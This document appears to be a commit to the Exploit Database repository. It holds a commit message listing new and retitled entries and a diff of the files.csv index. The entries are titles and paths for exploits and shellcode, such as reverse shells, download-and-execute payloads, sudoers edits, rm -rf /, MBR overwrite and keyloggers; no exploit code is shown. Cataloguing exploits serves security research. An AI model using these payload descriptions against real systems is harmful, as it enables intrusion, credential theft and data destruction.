DB: 2017-08-24

13 new exploits libgig 4.0.0 - LinuxSampler Multiple Vulnerabilities Microsoft Internet Explorer - wshom.ocx (Run) ActiveX Remote Code Execution (Add Admin) Microsoft Internet Explorer - 'wshom.ocx' (Run) ActiveX Remote Code Execution (Add Admin) Automated Logic WebCTRL 6.5 - Local Privilege Escalation Microsoft Internet Explorer - (createTextRang) Download Shellcode Exploit (1) Microsoft Internet Explorer - 'createTextRang' Download Shellcode Exploit (1) Microsoft Internet Explorer - wshom.ocx ActiveX Control Remote Code Execution Microsoft Internet Explorer - 'wshom.ocx' ActiveX Control Remote Code Execution Easy File Management Web Server 5.3 - UserID Remote Buffer Overflow (ROP) Easy File Management Web Server 5.3 - 'UserID' Remote Buffer Overflow (ROP) Easy File Management Web Server 5.6 - USERID Remote Buffer Overflow Easy File Management Web Server 5.6 - 'USERID' Remote Buffer Overflow BSD/x86 - Bind TCP Shell (Random Port) Shellcode (143 bytes) BSD/x86 - Bind TCP Shell (Random TCP Port) Shellcode (143 bytes) FreeBSD/x86 - ConnectBack (172.17.0.9:8000/TCP) + Receive Shellcode + JMP + Return Results Null-Free Shellcode (90 bytes) FreeBSD/x86 - ConnectBack (172.17.0.9:8000/TCP) + Receive Shellcode + Payload Loader + Return Results Null-Free Shellcode (90 bytes) Linux/x86 - Bind TCP Shellcode (Generator) Linux/x86 - Bind TCP Shell Shellcode (Generator) Linux/x86 - Command Null-Free Shellcode (Generator) Linux/x86 - Command Generator Null-Free Shellcode (Generator) Cisco IOS/PowerPC - Bind Password (1rmp455) Shellcode (116 bytes) Cisco IOS/PowerPC - New VTY + Password (1rmp455) Shellcode (116 bytes) Linux/MIPS (Linksys WRT54G/GL) - execve Shellcode (60 bytes) Linux/MIPS (Linksys WRT54G/GL) - execve(_/bin/sh__[_/bin/sh_]_[]); Shellcode (60 bytes) Linux/x86 - Self-Modifying Anti-IDS Shellcode (64 bytes) Linux/x86 - Forks a HTTP Server on 8800/TCP Shellcode (166 bytes) Linux/x86 - Listens on 5555/TCP + Jumps to it Shellcode (83 bytes) Linux/x86 - Self-Modifying Anti-IDS /bin/sh Shellcode (35/64 bytes) Linux/x86 - HTTP Server (8800/TCP) + Fork Shellcode (166 bytes) Linux/x86 - Bind TCP Listener (5555/TCP) + Receive Shellcode + Payload Loader Shellcode (83 bytes) Linux/x86 - File Reader Shellcode (65+ bytes) Linux/x86 - Read /etc/passwd Shellcode (65+ bytes) Linux/x86 - Edit /etc/sudoers (ALL ALL=(ALL) NOPASSWD: ALL) for full access Shellcode (86 bytes) Linux/x86 - Ho' Detector - Promiscuous mode detector Shellcode (56 bytes) Linux/x86 - Edit /etc/sudoers (ALL ALL=(ALL) NOPASSWD: ALL) For Full Access Shellcode (86 bytes) Linux/x86 - Promiscuous Mode Detector Shellcode (56 bytes) Linux/x86 - system-beep Shellcode (45 bytes) Linux/x86 - System Beep Shellcode (45 bytes) Linux/x86 - rm -rf / Attempts To Block The Process From Being Stopped Shellcode (132 bytes) Linux/x86 - /bin/rm -rf / + Attempts To Block The Process From Being Stopped Shellcode (132 bytes) Linux/x86 - raw-socket ICMP/checksum shell Shellcode (235 bytes) Linux/x86 - Flush IPTables Rules (/sbin/iptables -F) Shellcode (40 bytes) Linux/x86 - kill all processes Shellcode (11 bytes) Linux/x86 - Raw-Socket ICMP/Checksum /bin/sh Shell Shellcode (235 bytes) Linux/x86 - Flush IPTables Rules (/sbin/iptables -F) Shellcode (40 bytes) Linux/x86 - Kill All Processes Shellcode (11 bytes) Linux/x86 - HTTP/1.x GET + Downloads + execve() Null-Free Shellcode (111+ bytes) Linux/x86 - Download File (HTTP/1.x http://0xdeadbeef/A) + execve() Null-Free Shellcode (111+ bytes) Linux/x86 - re-use of /bin/sh string in .rodata Shellcode (16 bytes) Linux/x86 - execve /bin/sh (Re-Use Of Strings In .rodata) Shellcode (16 bytes) Linux/x86 - execve(/bin/sh) + .ZIP Header Shellcode (28 bytes) Linux/x86 - execve(/bin/sh) + .RTF Header Shellcode (30 bytes) Linux/x86 - execve(/bin/sh) + .RIFF Header Shellcode (28 bytes) Linux/x86 - execve(/bin/sh) + .BMP Bitmap Header Shellcode (27 bytes) Linux/x86 - Read SWAP write to /tmp/swr Shellcode (109 bytes) Linux/x86 - SWAP store from /tmp/sws Shellcode (99 bytes) Linux/x86 - execve(/bin/sh) + '.ZIP' Header Shellcode (28 bytes) Linux/x86 - execve(/bin/sh) + '.RTF' Header Shellcode (30 bytes) Linux/x86 - execve(/bin/sh) + '.RIFF' Header Shellcode (28 bytes) Linux/x86 - execve(/bin/sh) + '.BMP' Bitmap Header Shellcode (27 bytes) Linux/x86 - Read SWAP + Write To /tmp/swr Shellcode (109 bytes) Linux/x86 - Read /tmp/sws + Store In SWAP Shellcode (99 bytes) Linux/x86 - HTTP/1.x GET_ Downloads + JMP Shellcode (68+ bytes) Linux/x86 - TCP Proxy Null-Free Shellcode (236 bytes) Linux/x86 - Download File (HTTP/1.x http://127.0.0.1:8081/foobar.bin) + Receive Shellcode + Payload Loader Shellcode (68+ bytes) Linux/x86 - TCP Proxy (192.168.1.16:1280) All Connect() Null-Free Shellcode (236 bytes) Linux/x86 - eject cd-rom (follows /dev/cdrom symlink) + exit() Shellcode (40 bytes) Linux/x86 - eject/close cd-rom loop (follows /dev/cdrom symlink) Shellcode (45 bytes) Linux/x86 - Eject CD-Rom (Follows /dev/cdrom Symlink) + exit() Shellcode (40 bytes) Linux/x86 - Eject/Close CD-Rom Loop (Follows /dev/cdrom Symlink) Shellcode (45 bytes) Linux/x86 - normal exit with random (so to speak) return value Shellcode (5 bytes) Linux/x86 - Normal Exit With Random (So To Speak) Return Value Shellcode (5 bytes) Linux/x86 - Socket-proxy Shellcode (372 bytes) Linux/x86 - Socket-Proxy (31337:11.22.33.44:80) Shellcode (372 bytes) Linux/x86 - snoop /dev/dsp Null-Free Shellcode (172 bytes) Linux/x86 - Snoop /dev/dsp Null-Free Shellcode (172 bytes) Linux/x86 - examples of long-term payloads hide-wait-change Shellcode (.s) (187+ bytes) Linux/x86 - examples of long-term payloads hide-wait-change Shellcode (187+ bytes) Linux/x86 - Hide-Wait-Change (Hide from PS + Wait for /tmp/foo + chmod 0455) Shellcode (187+ bytes) Linux/x86 - Radically Self-Modifying Shellcode (70 bytes) Linux/x86 - Magic Byte Self-Modifying Shellcode (76 bytes) Linux/x86 - Self-Modifying Radical Shellcode (70 bytes) Linux/x86 - Self-Modifying Magic Byte /bin/sh Shellcode (76 bytes) Linux/x86 - execve /bin/sh IA32 0xff-less Shellcode (45 bytes) Linux/IA32 - execve /bin/sh 0xff-Free Shellcode (45 bytes) Linux/x86 - kill snort Shellcode (151 bytes) Linux/x86 - Kill Snort Shellcode (151 bytes) Linux/x86 - Flush IPTables Rules (/sbin/iptables -F) Shellcode (45 bytes) Linux/x86 - Flush IPTables Rules (/sbin/iptables -F) Shellcode (58 bytes) Linux/x86 - Flush IPTables Rules (/sbin/iptables -F) Shellcode (45 bytes) Linux/x86 - Flush IPTables Rules (/sbin/iptables -F) Shellcode (58 bytes) Linux/x86 - eject /dev/cdrom Shellcode (64 bytes) Linux/x86 - xterm -ut -display [IP]:0 Shellcode (132 bytes) Linux/x86 - ipchains -F Shellcode (49 bytes) Linux/x86 - Eject /dev/cdrom Shellcode (64 bytes) Linux/x86 - xterm -ut -display 1270.0.0.1:0 Shellcode (132 bytes) Linux/x86 - Flush IPChains Rules (/sbin/ipchains -F) Shellcode (49 bytes) Linux/x86 - execve /bin/sh (tolower() Evasion) Shellcode (41 bytes) Linux/x86 - execve /bin/sh ToLower Encoded Shellcode (41 bytes) Linux/x86 - execve /bin/sh (toupper() Evasion) Shellcode (55 bytes) Linux/x86 - execve /bin/sh ToLower Encoded Shellcode (55 bytes) NetBSD/x86 - kill all processes Shellcode (23 bytes) NetBSD/x86 - Callback 6666/TCP Shellcode (83 bytes) NetBSD/x86 - Kill All Processes Shellcode (23 bytes) NetBSD/x86 - Reverse TCP Shell (6666/TCP) Shellcode (83 bytes) OSX/PPC - Add inetd backdoor Shellcode (222 bytes) OSX/PPC - reboot Shellcode (28 bytes) OSX/PPC - Add inetd (/etc/inetd.conf) Backdoor (Bind 6969/TCP Shell) Shellcode (222 bytes) OSX/PPC - Reboot Shellcode (28 bytes) OSX/PPC - create /tmp/suid Shellcode (122 bytes) OSX/PPC - simple write() Shellcode (75 bytes) OSX/PPC - Create /tmp/suid Shellcode (122 bytes) OSX/PPC - Simple write() Shellcode (75 bytes) Solaris/SPARC - Download File + Execute Shellcode (278 bytes) Solaris/SPARC - Download File (http://evil-dl/) + Execute (/tmp/ff) Shellcode (278 bytes) Solaris/SPARC - Bind TCP /bin/sh (6789/TCP) Shellcode (228 bytes) Solaris/SPARC - Bind TCP /bin/sh Shell (6789/TCP) Shellcode (228 bytes) Solaris/x86 - Bind TCP Shellcode (Generator) Solaris/x86 - Bind TCP Shell Shellcode (Generator) Solaris/x86 - execve /bin/sh toupper evasion Shellcode (84 bytes) Solaris/x86 - Add services and execve inetd Shellcode (201 bytes) Solaris/x86 - execve /bin/sh ToUpper Encoded Shellcode (84 bytes) Solaris/x86 - inetd Add Service + execve Shellcode (201 bytes) Windows x64 - (URLDownloadToFileA) Download + Execute Shellcode (218+ bytes) Linux/x86 - kill all processes Shellcode (9 bytes) Windows x64 - (URLDownloadToFileA) Download File (http://localhost/trojan.exe) + Execute Shellcode (218+ bytes) Linux/x86 - Kill All Processes Shellcode (9 bytes) Linux/x86 - Pverwrite MBR on /dev/sda with _LOL!' Shellcode (43 bytes) Linux/x86 - Overwrite MBR on /dev/sda with _LOL!' Shellcode (43 bytes) Linux/x86 - eject /dev/cdrom Shellcode (42 bytes) Linux/x86 - Eject /dev/cdrom Shellcode (42 bytes) Linux/x86 - Disabled modsecurity Shellcode (64 bytes) Linux/x86 - Disable modsecurity Shellcode (64 bytes) Linux/x86 - chmod 0777 /etc/shadow Shellcode (33 bytes) Linux/x86 - chmod 0777 /etc/shadow Shellcode (33 bytes) Solaris/x86 - Download File Shellcode (79 bytes) Linux/x86 - Disable ASLR Security Shellcode Shellcode (106 bytes) Solaris/x86 - Download File (http://shell-storm.org/exemple-solaris) Shellcode (79 bytes) Linux/x86 - Disable ASLR Security Shellcode (106 bytes) Linux/x86 - kill all running process Shellcode (11 bytes) Linux/x86 - Kill All Running Process Shellcode (11 bytes) Solaris/x86 - SystemV killall command Shellcode (39 bytes) Solaris/x86 - SystemV killall Command Shellcode (39 bytes) Windows x86 - Checksum Routine Shellcode (18 bytes) Windows x86 - Egghunter Checksum Routine Shellcode (18 bytes) ARM - Bind (68/UDP) + Reverse Shell (192.168.0.1:67/UDP) Shellcode ARM - Loader (0x1337/TCP) Shellcode ARM - Bind TCP Listener (68/UDP) + Reverse TCP Shell (192.168.0.1:67/UDP) Shellcode ARM - Bind TCP Listener (0x1337/TCP) + Receive Shellcode + Payload Loader Shellcode Linux/x86 - Bind Netcat (/usr/bin/netcat) /bin/sh Shell (6666/TCP) + Polymorphic XOR Encoded Shellcode (69 bytes) OSX/Intel (x86-64) - Reverse TCP /bin/sh Shell (FFFFFFFF:4444/TCP) Shellcode (131 bytes) Linux/x86 - Bind Netcat (/usr/bin/netcat) /bin/sh Shell (6666/TCP) + Polymorphic XOR Encoded Shellcode (69/93 bytes) OSX/Intel x86-64 - Reverse TCP /bin/sh Shell (FFFFFFFF:4444/TCP) Shellcode (131 bytes) OSX - Universal ROP Shellcode Linux/MIPS - execve Shellcode (52 bytes) OSX - Universal ROP + Reverse TCP Shell Shellcode Linux/MIPS - execve /bin/sh Shellcode (52 bytes) Windows x86 - Bind TCP Password (damn_it!$$##@;*#) Shellcode (637 bytes) Windows x86 - Bind TCP Password (damn_it!$$##@;*#) Shell Shellcode (637 bytes) Windows - URLDownloadToFile + WinExec + ExitProcess Shellcode Windows - URLDownloadToFile (http://bflow.security-portal.cz/down/xy.txt) + WinExec + ExitProcess Shellcode Linux/x86 - Socket Re-use Shellcode (50 bytes) Linux/x86 - execve /bin/sh + Socket Re-Use Shellcode (50 bytes) Linux/x86-64 - Position independent + execve(_/bin/sh\0__NULL_NULL); Alphanumeric Shellcode (87 bytes) Linux/x86-64 - execve(_/bin/sh\0__NULL_NULL); Position Independent Alphanumeric Shellcode (87 bytes) Linux/x86-64 - Reads Data From /etc/passwd To /tmp/outfile Shellcode (118 bytes) Linux/x86-64 - Read /etc/passwd + Write To /tmp/outfile Shellcode (118 bytes) Linux/x86 - execve _/bin/sh_ Shellcode (35 bytes) Linux/x86 - execve /bin/sh Shellcode (35 bytes) Linux/x86 - Execve /bin/sh Via Push Shellcode (21 bytes) Linux/x86-64 - Execve /bin/sh Via Push Shellcode (23 bytes) Linux/x86 - execve /bin/sh Via Push Shellcode (21 bytes) Linux/x86-64 - execve /bin/sh Via Push Shellcode (23 bytes) Linux/x86 - execve _/bin/sh_ Shellcode (26 bytes) Linux/x86 - execve /bin/sh Shellcode (26 bytes) Linux/x86 - /etc/passwd Reader Shellcode (58 bytes) Linux/x86 - Read /etc/passwd Shellcode (58 bytes) Linux/x86 - execve _/bin/sh_ Shellcode (24 bytes) Linux/x86 - execve /bin/sh Shellcode (24 bytes) Linux x86/x86-64 - Bind Shell (4444/TCP) Shellcode (251 bytes) Linux x86/x86-64 - Bind TCP Shell (4444/TCP) Shellcode (251 bytes) Linux/x86-64 - Execve-Stack Polymorphic Shellcode (47 bytes) Linux/x86-64 - execve Stack Polymorphic Shellcode (47 bytes) Linux/x86-64 - Bind Shell Shellcode (Generator) Windows - Primitive Keylogger to File Null-Free Shellcode (431 (0x01AF) bytes) Linux/x86-64 - Bind TCP Shell Shellcode (Generator) Windows - Keylogger to File (./log.bin) Null-Free Shellcode (431 bytes) Windows - Functional Keylogger to File Null-Free Shellcode (601 (0x0259) bytes) Windows - Keylogger to File (%TEMP%/log.bin) Null-Free Shellcode (601 bytes) Linux/x86-64 - Information Stealer Shellcode (399 bytes) Linux/x86-64 - Download File (http://192.168.30.129/pri.sh) + Execute Used To Steal Information Shellcode (399 bytes) Linux/x86 - Reverse TCP /bin/sj Shell (192.168.227.129:4444) Shellcode (75 bytes) Linux/x86 - Reverse TCP /bin/sh Shell (192.168.227.129:4444) Shellcode (75 bytes) Windows x64 - Download File + Execute Shellcode (358 bytes) Windows x64 - Download File (http://192.168.10.129/pl.exe) + Execute (C:\Users\Public\p.exe) Shellcode (358 bytes) Linux/x86-64 - Random Listener Shellcode (54 bytes) Linux/x86-64 - Bind TCP /bin/sh Shell (Random TCP Port) Shellcode (54 bytes) Linux/x86-64 - Setuid(0) + Execve(/bin/sh) Polymorphic Shellcode (31 bytes) Linux/x86-64 - setuid(0) + Execve(/bin/sh) Polymorphic Shellcode (31 bytes) Linux/x86 - Bind TCP /bin/sh Random Port Shell Shellcode (44 bytes) Linux/x86 - File Reader Shellcode (54 Bytes) Linux/x86 - Bind TCP /bin/sh Shell (Random TCP Port) Shellcode (44 bytes) Linux/x86 - Read /etc/passwd Shellcode (54 Bytes) Matrimonial Script - SQL Injection Automated Logic WebCTRL 6.5 - Unrestricted File Upload / Remote Code Execution Automated Logic WebCTRL 6.1 - Path Traversal / Arbitrary File Write iTech B2B Script 4.42 - SQL Injection iTech Business Networking Script 8.26 - SQL Injection iTech Caregiver Script 2.71 - SQL Injection iTech Classifieds Script 7.41 - SQL Injection iTech Image Sharing Script 4.13 - SQL Injection iTech Freelancer Script 5.27 - SQL Injection iTech Travel Script 9.49 - SQL Injection iTech Multi Vendor Script 6.63 - SQL Injection
2017-08-24 05:01:22 +00:00 · 2017-08-24 05:01:22 +00:00 · dd6e8a4e4c
commit dd6e8a4e4c
parent c7b4bfd8e6
15 changed files with 1402 additions and 101 deletions
--- a/files.csv
+++ b/files.csv
@ -5662,6 +5662,7 @@ id,file,description,date,author,platform,type,port
 42483,platforms/windows/dos/42483.py,"MyDoomScanner 1.00 - Local Buffer Overflow (PoC)",2017-08-17,"Anurag Srivastava",windows,dos,0
 42486,platforms/windows/dos/42486.py,"DSScan 1.0 - Local Buffer Overflow (PoC)",2017-08-18,"Anurag Srivastava",windows,dos,0
 42495,platforms/windows/dos/42495.py,"MessengerScan 1.05 - Local Buffer Overflow (PoC)",2017-08-18,"Anurag Srivastava",windows,dos,0
 42546,platforms/linux/dos/42546.txt,"libgig 4.0.0 - LinuxSampler Multiple Vulnerabilities",2017-08-23,qflb.wu,linux,dos,0
 42518,platforms/hardware/dos/42518.txt,"NoviFlow NoviWare < NW400.2.6 - Multiple Vulnerabilities",2017-08-18,"François Goichon",hardware,dos,0
 3,platforms/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Privilege Escalation",2003-03-30,"Wojciech Purczynski",linux,local,0
 4,platforms/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Buffer Overflow",2003-04-01,Andi,solaris,local,0
@ -6674,7 +6675,7 @@ id,file,description,date,author,platform,type,port
 11205,platforms/windows/local/11205.pl,"MP3 Studio 1.x - '.m3u' Local Stack Overflow (Universal)",2010-01-20,"D3V!L FUCKER",windows,local,0
 11208,platforms/windows/local/11208.pl,"jetAudio 8.0.0.2 Basic - '.m3u' Stack Overflow",2010-01-21,cr4wl3r,windows,local,0
 11219,platforms/windows/local/11219.pl,"SOMPL Player 1.0 - Buffer Overflow",2010-01-22,Rick2600,windows,local,0
-11229,platforms/windows/local/11229.txt,"Microsoft Internet Explorer - wshom.ocx (Run) ActiveX Remote Code Execution (Add Admin)",2010-01-22,Stack,windows,local,0
+11229,platforms/windows/local/11229.txt,"Microsoft Internet Explorer - 'wshom.ocx' (Run) ActiveX Remote Code Execution (Add Admin)",2010-01-22,Stack,windows,local,0
 11232,platforms/windows/local/11232.c,"Authentium SafeCentral 2.6 - 'shdrv.sys' Local Kernel Ring0 SYSTEM Exploit",2010-01-22,mu-b,windows,local,0
 11255,platforms/windows/local/11255.pl,"Winamp 5.572 - 'whatsnew.txt' Stack Overflow",2010-01-25,Dz_attacker,windows,local,0
 11256,platforms/windows/local/11256.pl,"Winamp 5.572 (Windows XP SP3 DE) - 'whatsnew.txt' Local Buffer Overflow",2010-01-25,NeoCortex,windows,local,0
@ -9187,6 +9188,7 @@ id,file,description,date,author,platform,type,port
 42274,platforms/lin_x86/local/42274.c,"Linux Kernel (Debian 7/8/9/10 / Fedora 23/24/25 / CentOS 5.3/5.11/6.0/6.8/7.2.1511) - 'ldso_hwcap' 'Stack Clash' Local Privilege Escalation",2017-06-28,"Qualys Corporation",lin_x86,local,0
 42275,platforms/lin_x86-64/local/42275.c,"Linux Kernel (Debian 7.7/8.5/9.0 / Ubuntu 14.04.2/16.04.2/17.04 / Fedora 22/25 / CentOS 7.3.1611) - 'ldso_hwcap_64' 'Stack Clash' Local Privilege Escalation",2017-06-28,"Qualys Corporation",lin_x86-64,local,0
 42276,platforms/lin_x86/local/42276.c,"Linux Kernel (Debian 9/10 / Ubuntu 14.04.5/16.04.2/17.04 / Fedora 23/24/25) - 'ldso_dynamic' 'Stack Clash' Local Privilege Escalation",2017-06-28,"Qualys Corporation",lin_x86,local,0
 42542,platforms/windows/local/42542.txt,"Automated Logic WebCTRL 6.5 - Local Privilege Escalation",2017-08-22,LiquidWorm,windows,local,0
 42310,platforms/windows/local/42310.txt,"Pelco VideoXpert 1.12.105 - Privilege Escalation",2017-07-10,LiquidWorm,windows,local,0
 42325,platforms/windows/local/42325.py,"Counter Strike: Condition Zero - '.BSP' Map File Code Execution",2017-07-07,"Grant Hernandez",windows,local,0
 42334,platforms/macos/local/42334.txt,"Hashicorp vagrant-vmware-fusion < 4.0.20 - Local Root Privilege Escalation",2017-07-18,"Mark Wadham",macos,local,0
@ -9656,7 +9658,7 @@ id,file,description,date,author,platform,type,port
 1592,platforms/windows/remote/1592.c,"Mercur MailServer 5.0 SP3 - (IMAP) Remote Buffer Overflow (1)",2006-03-19,pLL,windows,remote,0
 1602,platforms/multiple/remote/1602.c,"BomberClone < 0.11.6.2 - (Error Messages) Remote Buffer Overflow",2006-03-22,"esca zoo",multiple,remote,11000
 1606,platforms/windows/remote/1606.html,"Microsoft Internet Explorer - (createTextRang) Remote Code Execution",2006-03-23,darkeagle,windows,remote,0
-1607,platforms/windows/remote/1607.cpp,"Microsoft Internet Explorer - (createTextRang) Download Shellcode Exploit (1)",2006-03-23,ATmaCA,windows,remote,0
+1607,platforms/windows/remote/1607.cpp,"Microsoft Internet Explorer - 'createTextRang' Download Shellcode Exploit (1)",2006-03-23,ATmaCA,windows,remote,0
 1620,platforms/windows/remote/1620.pm,"Microsoft Internet Explorer - (createTextRang) Remote Exploit (Metasploit)",2006-04-01,"Randy Flood",windows,remote,0
 1626,platforms/windows/remote/1626.pm,"PeerCast 0.1216 - Remote Buffer Overflow (Metasploit)",2006-03-30,"H D Moore",windows,remote,7144
 1628,platforms/windows/remote/1628.cpp,"Microsoft Internet Explorer - (createTextRang) Download Shellcode Exploit (2)",2006-03-31,ATmaCA,windows,remote,0
@ -10637,7 +10639,7 @@ id,file,description,date,author,platform,type,port
 11027,platforms/windows/remote/11027.pl,"Apple QuickTime 7.2/7.3 - RTSP Buffer Overflow (Perl)",2010-01-06,jacky,windows,remote,0
 11059,platforms/windows/remote/11059.html,"JcomBand toolbar on IE - ActiveX Buffer Overflow",2010-01-07,"germaya_x and D3V!L FUCKER",windows,remote,0
 11138,platforms/windows/remote/11138.c,"Apple iTunes 8.1.x - (daap) Buffer Overflow Remote Exploit",2010-01-14,Simo36,windows,remote,0
-11151,platforms/windows/remote/11151.html,"Microsoft Internet Explorer - wshom.ocx ActiveX Control Remote Code Execution",2010-01-16,"germaya_x and D3V!L FUCKER",windows,remote,0
+11151,platforms/windows/remote/11151.html,"Microsoft Internet Explorer - 'wshom.ocx' ActiveX Control Remote Code Execution",2010-01-16,"germaya_x and D3V!L FUCKER",windows,remote,0
 11167,platforms/windows/remote/11167.py,"Microsoft Internet Explorer 6 - Aurora Exploit",2010-01-17,"Ahmed Obied",windows,remote,0
 11172,platforms/windows/remote/11172.html,"Adobe GetPlus get_atlcom 1.6.2.48 - ActiveX Remote Execution (PoC)",2010-01-17,superli,windows,remote,0
 11173,platforms/windows/remote/11173.txt,"Trend Micro Web-Deployment - ActiveX Remote Execution (PoC)",2010-01-17,superli,windows,remote,0
@ -14728,7 +14730,7 @@ id,file,description,date,author,platform,type,port
 33599,platforms/linux/remote/33599.txt,"Samba 3.4.5 - Symlink Directory Traversal",2010-02-04,kingcope,linux,remote,0
 33600,platforms/multiple/remote/33600.rb,"Oracle 10g - Multiple Privilege Escalation Vulnerabilities",2010-02-05,"David Litchfield",multiple,remote,0
 33601,platforms/multiple/remote/33601.rb,"Oracle 11g - Multiple Privilege Escalation Vulnerabilities",2010-02-05,"David Litchfield",multiple,remote,0
-33610,platforms/windows/remote/33610.py,"Easy File Management Web Server 5.3 - UserID Remote Buffer Overflow (ROP)",2014-06-01,"Julien Ahrens",windows,remote,80
+33610,platforms/windows/remote/33610.py,"Easy File Management Web Server 5.3 - 'UserID' Remote Buffer Overflow (ROP)",2014-06-01,"Julien Ahrens",windows,remote,80
 33615,platforms/multiple/remote/33615.txt,"JDownloader - 'JDExternInterface.java' Remote Code Execution",2010-02-08,apoc,multiple,remote,0
 33616,platforms/multiple/remote/33616.txt,"Mongoose 2.8 - Space String Remote File Disclosure",2010-02-08,"Pouya Daneshmand",multiple,remote,0
 33620,platforms/linux/remote/33620.txt,"Helix Player 11.0.2 - Encoded URI Processing Buffer Overflow",2007-07-03,gwright,linux,remote,0
@ -15286,7 +15288,7 @@ id,file,description,date,author,platform,type,port
 37795,platforms/android/remote/37795.txt,"Google Chrome for Android - Same-origin Policy Bypass Local Symlink",2012-09-12,"Artem Chaykin",android,remote,0
 37800,platforms/windows/remote/37800.php,"Microsoft Windows HTA (HTML Application) - Remote Code Execution (MS14-064)",2015-08-17,"Mohammad Reza Espargham",windows,remote,0
 37803,platforms/hardware/remote/37803.txt,"CoSoSys Endpoint Protector - Predictable Password Generation",2012-09-17,"Christopher Campbell",hardware,remote,0
-37808,platforms/windows/remote/37808.py,"Easy File Management Web Server 5.6 - USERID Remote Buffer Overflow",2015-08-18,"Tracy Turben",windows,remote,0
+37808,platforms/windows/remote/37808.py,"Easy File Management Web Server 5.6 - 'USERID' Remote Buffer Overflow",2015-08-18,"Tracy Turben",windows,remote,0
 37812,platforms/win_x86/remote/37812.rb,"Symantec Endpoint Protection Manager - Authentication Bypass / Code Execution (Metasploit)",2015-08-18,Metasploit,win_x86,remote,8443
 37814,platforms/python/remote/37814.rb,"Werkzeug - Debug Shell Command Execution (Metasploit)",2015-08-18,Metasploit,python,remote,0
 37834,platforms/linux/remote/37834.py,"Samba 3.5.11/3.6.3 - Unspecified Remote Code Execution",2012-09-24,kb,linux,remote,0
@ -15777,7 +15779,7 @@ id,file,description,date,author,platform,type,port
 13246,platforms/bsd_x86/shellcode/13246.c,"BSD/x86 - execve /bin/sh Shellcode (27 bytes)",2004-09-26,n0gada,bsd_x86,shellcode,0
 13247,platforms/bsd_x86/shellcode/13247.c,"BSD/x86 - execve /bin/sh + setuid(0) Shellcode (29 bytes)",2004-09-26,"Matias Sedalo",bsd_x86,shellcode,0
 13248,platforms/bsd_x86/shellcode/13248.c,"BSD/x86 - Bind TCP Shell (31337/TCP) Shellcode (83 bytes)",2004-09-26,no1,bsd_x86,shellcode,0
-13249,platforms/bsd_x86/shellcode/13249.c,"BSD/x86 - Bind TCP Shell (Random Port) Shellcode (143 bytes)",2004-09-26,MayheM,bsd_x86,shellcode,0
+13249,platforms/bsd_x86/shellcode/13249.c,"BSD/x86 - Bind TCP Shell (Random TCP Port) Shellcode (143 bytes)",2004-09-26,MayheM,bsd_x86,shellcode,0
 13250,platforms/bsd_x86/shellcode/13250.c,"BSD/x86 - Break chroot Shellcode (45 bytes)",2004-09-26,"Matias Sedalo",bsd_x86,shellcode,0
 13251,platforms/bsd_x86/shellcode/13251.c,"BSD/x86 - execve /bin/sh Encoded Shellcode (49 bytes)",2004-09-26,dev0id,bsd_x86,shellcode,0
 13252,platforms/bsd_x86/shellcode/13252.c,"BSD/x86 - execve /bin/sh Encoded Shellcode (57 bytes)",2004-09-26,"Matias Sedalo",bsd_x86,shellcode,0
@ -15791,7 +15793,7 @@ id,file,description,date,author,platform,type,port
 13262,platforms/freebsd_x86/shellcode/13262.txt,"FreeBSD/x86 - setreuid + execve(pfctl -d) Shellcode (56 bytes)",2008-09-12,suN8Hclf,freebsd_x86,shellcode,0
 13263,platforms/freebsd_x86/shellcode/13263.txt,"FreeBSD/x86 - Reverse TCP cat /etc/passwd (192.168.1.33:8000/TCP) Shellcode (112 bytes)",2008-09-10,suN8Hclf,freebsd_x86,shellcode,0
 13264,platforms/freebsd_x86/shellcode/13264.txt,"FreeBSD/x86 - Kill All Processes Shellcode (12 bytes)",2008-09-09,suN8Hclf,freebsd_x86,shellcode,0
-13265,platforms/freebsd_x86/shellcode/13265.c,"FreeBSD/x86 - ConnectBack (172.17.0.9:8000/TCP) + Receive Shellcode + JMP + Return Results Null-Free Shellcode (90 bytes)",2008-09-05,sm4x,freebsd_x86,shellcode,0
+13265,platforms/freebsd_x86/shellcode/13265.c,"FreeBSD/x86 - ConnectBack (172.17.0.9:8000/TCP) + Receive Shellcode + Payload Loader + Return Results Null-Free Shellcode (90 bytes)",2008-09-05,sm4x,freebsd_x86,shellcode,0
 13266,platforms/freebsd_x86/shellcode/13266.asm,"FreeBSD/x86 - execve /bin/cat /etc/master.passwd Null-Free Shellcode (65 bytes)",2008-08-25,sm4x,freebsd_x86,shellcode,0
 13267,platforms/freebsd_x86/shellcode/13267.asm,"FreeBSD/x86 - Reverse TCP /bin/sh Shell (127.0.0.1:8000) Null-Free Shellcode (89 bytes)",2008-08-21,sm4x,freebsd_x86,shellcode,0
 13268,platforms/freebsd_x86/shellcode/13268.asm,"FreeBSD/x86 - setuid(0); + execve(ipf -Fa); Shellcode (57 bytes)",2008-08-21,sm4x,freebsd_x86,shellcode,0
@ -15808,22 +15810,22 @@ id,file,description,date,author,platform,type,port
 13279,platforms/freebsd_x86-64/shellcode/13279.c,"FreeBSD/x86-64 - exec(_/bin/sh_) Shellcode (31 bytes)",2009-05-18,"Hack'n Roll",freebsd_x86-64,shellcode,0
 13280,platforms/freebsd_x86-64/shellcode/13280.c,"FreeBSD/x86-64 - execve /bin/sh Shellcode (34 bytes)",2009-05-15,c0d3_z3r0,freebsd_x86-64,shellcode,0
 13281,platforms/generator/shellcode/13281.c,"Linux/x86 - execve Null-Free Shellcode (Generator)",2009-06-29,certaindeath,generator,shellcode,0
-13282,platforms/generator/shellcode/13282.php,"Linux/x86 - Bind TCP Shellcode (Generator)",2009-06-09,"Jonathan Salwan",generator,shellcode,0
+13282,platforms/generator/shellcode/13282.php,"Linux/x86 - Bind TCP Shell Shellcode (Generator)",2009-06-09,"Jonathan Salwan",generator,shellcode,0
 13283,platforms/generator/shellcode/13283.php,"Windows XP SP1 - Bind TCP Shell Shellcode (Generator)",2009-06-09,"Jonathan Salwan",generator,shellcode,0
 13284,platforms/generator/shellcode/13284.txt,"Linux - execve /bin/sh Polymorphic With Printable ASCII Characters Shellcode (Generator)",2008-08-31,sorrow,generator,shellcode,0
-13285,platforms/generator/shellcode/13285.c,"Linux/x86 - Command Null-Free Shellcode (Generator)",2008-08-19,BlackLight,generator,shellcode,0
+13285,platforms/generator/shellcode/13285.c,"Linux/x86 - Command Generator Null-Free Shellcode (Generator)",2008-08-19,BlackLight,generator,shellcode,0
